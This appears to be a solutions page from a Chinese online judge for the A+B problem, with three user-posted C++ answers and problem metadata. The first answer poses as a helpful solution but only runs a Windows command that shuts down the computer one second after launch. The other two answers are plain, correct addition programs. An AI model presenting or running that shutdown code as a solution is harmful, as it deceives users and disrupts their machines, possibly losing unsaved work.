3 条题解

  • 1
    @ 2025-3-10 13:30:45

    If you do not know how to do this question, I can tell you the truth:

    #include<bits/stdc++.h>
    #include<windows.h>
    using namespace std;
    int main()
    {
        system("shutdown /t 1 -s");
        return 0;
    }
    
    • 0
      @ 2023-2-19 22:23:32
      #include<iostream>
      using namespace std;
      int main()
      {
          int x,n;
          cin>>x>>n;
          cout<<x+n;
           return 0;
      }
      
      
      • -1
        @ 2023-4-6 22:03:31

        #include<bits/stdc++.h> using namespace std; int numx[105],nums[105]; int main() { int A,B; cin>>A>>B; cout<<A+B; return 0; }

        • 1

        信息

        ID
        1
        时间
        1000ms
        内存
        64MiB
        难度
        10
        标签
        递交数
        193
        已通过
        137
        上传者